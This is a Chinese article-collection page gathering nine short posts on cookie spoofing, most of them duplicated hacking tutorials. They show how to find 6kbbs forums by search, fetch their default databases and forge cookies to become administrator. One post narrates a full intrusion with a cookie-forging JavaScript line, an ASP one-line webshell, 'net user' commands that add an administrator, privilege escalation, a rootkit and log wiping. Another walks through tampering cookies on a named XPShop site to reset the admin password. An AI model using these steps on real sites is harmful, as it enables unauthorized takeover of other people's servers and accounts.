教你熟知Cookies文件的欺骗

时间:2023-04-10 07:56:27 其他范文 收藏本文 下载本文

教你熟知Cookies文件的欺骗(共9篇)由网友“德德鹅”投稿提供,下面是小编帮大家整理后的教你熟知Cookies文件的欺骗,希望对大家有所帮助。

教你熟知Cookies文件的欺骗

篇1:教你熟知Cookies文件的欺骗

第一、几个基本概念

Cookies欺骗,就是在只对用户做Cookies验证的系统中,通过修改Cookies的内容来得到相应的用户权限登录,

那么什么是Cookies呢,我这里给大家一个专业的解释,Cookies是一个储存于浏览器目录中的文本文件,记录你访问一个特定站点的信息,且只能被创建这个Cookies的站点读回,约由255个字符组成,仅占4KB硬盘空间。当用户正在浏览某站点时,它储存于用户机的随机存取存储器RAM中,退出浏览器后,它储存于用户的硬盘中。储存在Cookies中的大部分信息是普通的,如当你浏览一个站点时,此文件记录了每一次的击键信息和被访站点的地址等。但是许多Web站点使用Cookies来储存针对私人的数据,如:注册口令、用户名、信用卡编号等。

第二、原理分析

我们先来看一下6kbbs是怎么做的,在login.asp中我们找到113――124行,看下面:

if login=false then tl=“ 登 陆 失 败” mes=mes&“・返回重新填写” else Response.Cookies(prefix)(“lgname”)=lgname session(prefix“lgname”)=lgname Response.Cookies(prefix)(“lgpwd”)=lgpwd Response.Cookies(prefix)(“lgtype”)=lgtype Response.Cookies(prefix)(“lgcook”)=cook if cook>0 then Response.Cookies(prefix).Expires=date+cook end if

我把这段话的意思换个说法,就是说如果你登录失败了他就显示你登录失败并引导你返回上一页,否则就给你写进Cookies里面,如果你的Cookies有的话那么你的过期时间就是你Cookies的过期时间――也就是你保存Cookies的时间了,

到这里,你想到什么了?对,以后登录它只要Cookies,那如果我的Cookies里面的信息是管理员的我岂不是成为管理员了?聪明,接着往下看我们怎么做。

第三、Cookies欺骗实例

在这里我以6kbbs为例,同时假设你已经拿到网站数据库或者是管理员MD5加密的密码。怎么拿呢,到搜索引擎去搜索关键字“powered by 6kbbs”,然后你就会看到一大堆6kbbs的网站了,

首先,我们先去注册一个用户,然后登录,看到了吗?有个Cookies保存的选项,一定要选哦。我选择是保存一个月,因为保存了才会再你本机上写进它的Cookies。接着,打开数据库,看Admin表里面有什么东西,别的不管,你只要那个bd为16的那个人就行了。有可能没有,没关系,你到他们论坛去逛一下,看管理员是谁,然后在数据库里面拿他的账号和加密的密码来欺骗。

打开IECookiesView,这款软件是拿来察看和修改本机的Cookies的,很方便我们的Cookies欺骗入侵。

在IECookiesView 里找到你要欺骗的那个网站,看到了吗?有你的用户名和MD5加密的密码,我们吧这两项改为管理员的,就是把刚才数据库里面的管理员账号和MD5加密的密码代替你自己的。点击“更改cookies”,打开一个新的IE,然后再去访问那个论坛,看到没有?你现在已经是管理员了。

题外话

1、对这个论坛的欺骗只能拿到前台管理员权限,后台需要输入密码,而且是Session验证,不是Cookies,所以我们欺骗不了。

2、这个论坛还有上传,可以上传木马,考虑到很多高手已经写出来动画教程,我这里就不写了,大家有兴趣可以去搜索一下,学习一下也好,不做坏事就行。

3、Cookies欺骗大量存在于现在的一些不做Session验证的程序中,所以,如果你拿到数据库或者管理员加密密码,不妨试一下Cookies欺骗,会有意想不到的效果哦。

篇2: 菜鸟教程之熟知Cookies文件的欺骗

第一、几个基本概念

Cookies欺骗,就是在只对用户做Cookies验证的系统中,通过修改Cookies的内容来得到相应的用户权限登录,

菜鸟教程之熟知Cookies文件的欺骗

那么什么是Cookies呢,我这里给大家一个专业的解释,Cookies是一个储存于浏览器目录中的文本文件,记录你访问一个特定站点的信息,且只能被创建这个Cookies的站点读回,约由255个字符组成,仅占4KB硬盘空间。当用户正在浏览某站点时,它储存于用户机的随机存取存储器RAM中,退出浏览器后,它储存于用户的硬盘中。储存在Cookies中的大部分信息是普通的,如当你浏览一个站点时,此文件记录了每一次的击键信息和被访站点的地址等。但是许多Web站点使用Cookies来储存针对私人的数据,如:注册口令、用户名、信用卡编号等。

第二、原理分析

我们先来看一下6kbbs是怎么做的,在login.asp中我们找到113――124行,看下面:

if login=false then tl=“ 登 陆 失 败” mes=mes&“・返回重新填写” else Response.Cookies(prefix)(“lgname”)=lgname session(prefix“lgname”)=lgname Response.Cookies(prefix)(“lgpwd”)=lgpwd Response.Cookies(prefix)(“lgtype”)=lgtype Response.Cookies(prefix)(“lgcook”)=cook if cook>0 then Response.Cookies(prefix).Expires=date+cook end if

我把这段话的意思换个说法,就是说如果你登录失败了他就显示你登录失败并引导你返回上一页,否则就给你写进Cookies里面,如果你的Cookies有的话那么你的过期时间就是你Cookies的过期时间――也就是你保存Cookies的时间了,

到这里,你想到什么了?对,以后登录它只要Cookies,那如果我的Cookies里面的信息是管理员的我岂不是成为管理员了?聪明,接着往下看我们怎么做。

第三、Cookies欺骗实例

在这里我以6kbbs为例,同时假设你已经拿到网站数据库或者是管理员MD5加密的密码。怎么拿呢,到搜索引擎去搜索关键字“powered by 6kbbs”,然后你就会看到一大堆6kbbs的网站了,

首先,我们先去注册一个用户,然后登录,看到了吗?有个Cookies保存的选项,一定要选哦。我选择是保存一个月,因为保存了才会再你本机上写进它的Cookies。接着,打开数据库,看Admin表里面有什么东西,别的不管,你只要那个bd为16的那个人就行了。有可能没有,没关系,你到他们论坛去逛一下,看管理员是谁,然后在数据库里面拿他的账号和加密的密码来欺骗。

打开IECookiesView,这款软件是拿来察看和修改本机的Cookies的,很方便我们的Cookies欺骗入侵。

在IECookiesView 里找到你要欺骗的那个网站,看到了吗?有你的用户名和MD5加密的密码,我们吧这两项改为管理员的,就是把刚才数据库里面的管理员账号和MD5加密的密码代替你自己的。点击“更改cookies”,打开一个新的IE,然后再去访问那个论坛,看到没有?你现在已经是管理员了。

题外话

1、对这个论坛的欺骗只能拿到前台管理员权限,后台需要输入密码,而且是Session验证,不是Cookies,所以我们欺骗不了。

2、这个论坛还有上传漏洞,可以上传木马,考虑到很多高手已经写出来动画教程,我这里就不写了,大家有兴趣可以去搜索一下,学习一下也好,不做坏事就行。

3、Cookies欺骗大量存在于现在的一些不做Session验证的程序中,所以,如果你拿到数据库或者管理员加密密码,不妨试一下Cookies欺骗,会有意想不到的效果哦。

篇3:什么是Cookies欺骗技术

第一、几个基本概念 Cookies欺骗,就是在只对用户做Cookies验证的系统中,通过修改Cookies的内容来得到相应的用户权限登录,

什么是Cookies欺骗技术

(呵呵,我自己的定义,高手别见笑) 那么什么是Cookies呢,我这里给大家一个专业的解释,Cookies是一个储存于浏览器目录中的文本文

篇4:Cookies欺骗的艺术

DB_OWNER权限,SQL Server禁止多句执行(偶就不能通过WEB方式备份得到shell了),开了3389(冲着它来的)

后台没什么功能,想放弃,可发现了下面的一幕

发现了一个计数器程序的readme

www.abc.com/count/readme.txt

有说明就好办,从网上下了个源程序来

发现漏洞文件count/admin.asp代码如下

_____________________________________________________________

<%

'******************************

'

'      飞越访客单用户统计系统

'   飞越   feiyueziwo@sohu.com

'        www.pwsite.net

'

'     版权所有: 动力在线

'

'******************************

%>

<%

response.write Request.Cookies(feiyue)(“Username”)

if Request.Cookies(feiyue)(“Username”)=“” then

response.end

response.Redirect(“login.asp?action=error”)

end if%>

...........

_____________________________________________________________

cookies欺骗一句话就可以搞定

再IE里输入以下代码,再访问www.abc.com/count/admin.asp就是管理员了

javascript.:document.cookie=“feiyue=Username=cooldiyer”;

后台没什么可利用,郁闷,数据库插马本机测试可以成功,可它网站的不行,压缩了数据库还不行,

后台不能上传文件,只一个备份数据库功能,利用这个功能把数据库连接文件给显示了出来,得到

SQL Server连接用户和密码,远程连接后备份数据库log得到一个shell

主机开了Serv-U 6.2,上传Serv-U本地提权工具ftp.exe

写了一句话木马如下:

<%=Server.CreateObject(“wscript.shell”).exec(request(“cmd”)).stdout.readall%>

执行:

www.abc.com/shell.asp?cmd=D:\www\ftp.exe “net user cooldiyer /add”

www.abc.com/shell.asp?cmd=D:\www\ftp.exe “net localgroup administrators cooldiyer /add”

成功!连其3389端口,安上rootkit,CA一个管理员,CleanLog,闪人.......

篇5:菜鸟教程之cookies欺骗

第一,几个基本概念

cookies欺骗,就是在只对用户做cookies验证的系统中,通过修改cookies的内容来得到相应的用

户权限登录,(呵呵,我自己的定义,高手别见笑)

那么什么是cookies呢,我这里给大家一个专业的解释,Cookies是一个储存于浏览器目录中的文

本文件,记录你访问一个特定站点的信息,且只能被创建这个Cookies的站点读回,约由255个字

符组成,仅占4KB硬盘空间。当用户正在浏览某站点时,它储存于用户机的随机存取存储器RAM

中,退出浏览器后,它储存于用户的硬盘中。储存在Cookies中的大部分信息是普通的,如当你

浏览一个站点时,此文件记录了每一次的击键信息和被访站点的地址等。但是许多Web站点使用

Cookies来储存针对私人的数据,如:注册口令、用户名、信用卡编号等。

第二,原理分析

我们先来看一下6kbbs是怎么做的,在login.asp中我们找到113――124行,

看下面:

if login=false then

tl=“ 登 陆 失 败”

mes=mes&“・

src=pic/re.gif align=absmiddle>返回重新填写”

else

Response.Cookies(prefix)(“lgname”)=lgname

session(prefix&“lgname”)=lgname

Response.Cookies(prefix)(“lgpwd”)=lgpwd

Response.Cookies(prefix)(“lgtype”)=lgtype

Response.Cookies(prefix)(“lgcook”)=cook

if cook>0 then

Response.Cookies(prefix).Expires=date+cook

end if

菜鸟你别说晕啊,你要晕我也晕了,我吧这段话的意思打改说一下,就是说如果你登录失败了他

就显示你登录失败并引导你返回上一页,否则就给你写进cookies里面,如果你的cookies有的话

那么你的过期时间就是你cookies的过期时间――也就是你保存cookies的时间了。

到这里,你想到什么了?对,以后登录它只要cookies,那如果我的cookies里面的信息是管理员

的我岂不是成为管理员了?聪明,接着往下看我们怎么做:

第三,cookies欺骗实例

在这里我以6kbbs为例,同时假设你已经拿到网站数据库或者是管理员MD5加密的密码,

怎么拿

呢,follow me %$% 到搜索引擎去搜索关键字“powered by 6kbbs”,然后你就会看到一大堆

6kbbs的网站了,他的数据库在 www.***.com/bbs/db/6k.mdb (经过我的测试,我发现用

这个论坛的人至少有60%以上是不改默认数据库路径的,我也不知道为什么),好了,下载

回来没有?我们要开工了。

首先,我们先去注册一个用户,然后登录,看到了吗?有个cookies保存的选项,一定要选哦,

我选择是保存一个月,因为保存了才会再你本机上写进它的cookies。接着,打开数据库,看

admin表里面有什么东西,别的不管,你只要那个bd为16的那个人就行了,有可能没有,没关

系,你到他们论坛去逛一下,看管理员是谁,然后在数据库里面拿他的账号和加密的密码来欺

骗。

打开IECookiesView 晕,你没有啊?快去 www.down99.com/SoftView/SoftView_270.html

下载回来再听,大家等着你呢,快点哦,呵呵%¥……%¥,算了,等它也是白等,我就先介绍

一下IECookiesView吧,这款软件是那来察看和修改本机的cookies的,很方便我们的cookies

欺骗入侵,诶,这么快救下载好了,那我们就继续吧,不废话了(下面小菜:晕,这么多废话了

还说不废话,真想拿香蕉砸他)

在IECookiesView 里找到你要欺骗的那个网站,看到了吗?有你的用户名和MD5加密的密码,我

们吧这两项改为管理员的,就是把刚才数据库里面的管理员账号和MD5加密的密码代替你自己

的。点击“更改cookies”,OK了,打开一个新的IE,然后再去访问那个论坛,看到没有?你现

在已经是管理员了%¥……##¥・,呵呵,

别捣乱哦。

=============

题外话

=============

1,对这个论坛的欺骗只能拿到前台管理员权限,后台需要输入密码,而且是session验证,不是

cookies,所以我们欺骗不了了。

2,这个论坛还有上传漏洞,可以上传木马,考虑到很多高手已经写出来动画教程,我这里就不

写了,大家有兴趣可以去搜索一下,学习一下也好,不做坏事就行。

3,cookies欺骗大量存在于现在的一些不做session验证的程序中,所以,如果你拿到数据库或

者管理员加密密码,不妨试一下cookies欺骗,会有意想不到的效果哦。

篇6:什么是Cookies和session欺骗?(实例讲解)

cookies欺骗,就是在只对用户做cookies验证的系统中,通过修改cookies的内容来得到相应的用户权限登录,

什么是Cookies和session欺骗?(实例讲解)

那么什么是cookies呢,我这里给大家一个专业的解释,cookies是一个储存于浏览器目录中的文本文件,记录你访问一个特定站点的信息,且只能被创建这个coo

篇7:什么是txt文件欺骗

在众多媒体的宣传报道下,今天的我们都知道了不能轻易打开电子邮件里的可执行文 件类的附件,但是显然那些破坏活动的制造者们也看了那些警告防范的文章,他们开始玩一些新的把戏,让您以为那些附件只不过是没有危险的文本文件或是图像文件等就是其手段之一,

什么是txt文件欺骗

篇8:如何识别.txt文件欺骗

在众多媒体的宣传报道下,今天的我们都知道了不能轻易打开电子邮件里的可执行文件类的附件,但是显然那些破坏活动的制造者们也看了那些警告防范的文章,他们开始玩一些新的把戏,让您以为那些附件只不过是没有危险的文本文件或是图像文件等就是其手段之一,

如何识别.txt文件欺骗

篇9:XPSHOP商城系统Cookies欺骗漏洞漏洞预警

文章作者:121711090

信息来源:邪恶八进制信息安全团队(www.eviloctal.com)

无意中发现这个漏洞的..官方现在还不知道...我没有在别处公布哦..

这个漏洞不好...要直拉改人家管理员密码!!有点儿缺德!!!...

但为了我们的网络更安全..还是看看吧...

首先先看看这个站吧:demo1.xpshop.cn/

先注册一个用户进去..为了方便也为了不要那么垃圾账户在人家系统里.我这说一下我注册好了的用户名:wc1217 密码:77423704

好..还是用啊D打开网站比较好..看截图:记得要保留cookies

之后便看看他的Cookies...

代码:

LoginCode=0684; demo1.xpshop.cnResource=zh-cn; ASP.NET_SessionId=3pxjo23zuikyrk45mx0g4a55; XpShop_CartID=0f810c00-fbbf-4984-951e-555357b14a54; demo1.xpshop.cnLogin=mid=14

我们改一下这两个值:LoginCode=0684;mid=14 .......都改成1  :

代码:

LoginCode=1; demo1.xpshop.cnResource=zh-cn; ASP.NET_SessionId=3pxjo23zuikyrk45mx0g4a55; XpShop_CartID=0f810c00-fbbf-4984-951e-555357b14a54; demo1.xpshop.cnLogin=mid=1

点击修改..后右键刷新看一下..要注意.不要刷得太快...不然就没用了..

之后就成这样了:

当然..也有可能没有..那我们就要改一下:“ASP.NET_SessionId=” 这个值就好了..随便改一个字就行:如下:

代码:

LoginCode=1; demo1.xpshop.cnResource=zh-cn; ASP.NET_SessionId=fu1q1w3g3qc2vn55naohei55; XpShop_CartID=0f810c00-fbbf-4984-951e-555357b14a54; demo1.xpshop.cnLogin=mid=1

好了..现在再看看会员信息:

是不是有一个“找回密码答案:”呵.....个位都想到了吧..直接就能改管理员密码了..

demo1.xpshop.cn/memberLostpass.aspx这个是改密码的..

如下图:

成功.....demo1.xpshop.cn/admin/default.aspx这里登录后就是怎么拿WEBSHELL了..

可是我一直没弄成..理论是只有这样才行..看..

先插马..再备份..但这里出错了..

还望达人能想出更好的办法..

我想了一晚上了....没辙了....

demo1.xpshop.cn/admin/ftb.imagegallery.aspx?frame=1&rif=admin&cif=admin 这可以列目录

好..就那么多了....有哪位达人弄出好办法了..千万别望了告诉我呀...联系方式:blog.sina.com.cn/qq1217

demo1.xpshop.cn/helps/t.txt

添加flash广告处可直接上传马

营销管理 - flash广告添加

Cookies欺骗的艺术

教你 C 盘空间不足的有效清理方法

网站测试,Web性能测试与可用性测试

无忧购物系统ASP时尚版和通用版上传漏洞利用网站安全

ASP 3.0高级编程三

Discuz XSS得webshell脚本安全

网络安全与道德作文

如何防范网站数据库入侵

台后 范文

win7系统盘清理

教你熟知Cookies文件的欺骗
《教你熟知Cookies文件的欺骗.doc》
将本文的Word文档下载到电脑,方便收藏和打印
推荐度:
点击下载文档

【教你熟知Cookies文件的欺骗(共9篇)】相关文章:

叙利奥颁奖词2023-09-21

贪吃的奥利奥2022-05-14

鸡肋的反射性xss脚本安全2023-04-01

如何提高系统安全――从Cookies开始!2022-10-04

BBSXP,很多注入脚本安全2023-02-15

Cookies文件夹的用处2022-05-20

初学驾驶证心得体会2023-11-26

C.net web开发面试题2024-01-18

文章的快乐2023-02-02

我有高招 傲游无痕―隐私保护2022-10-05

点击下载本文文档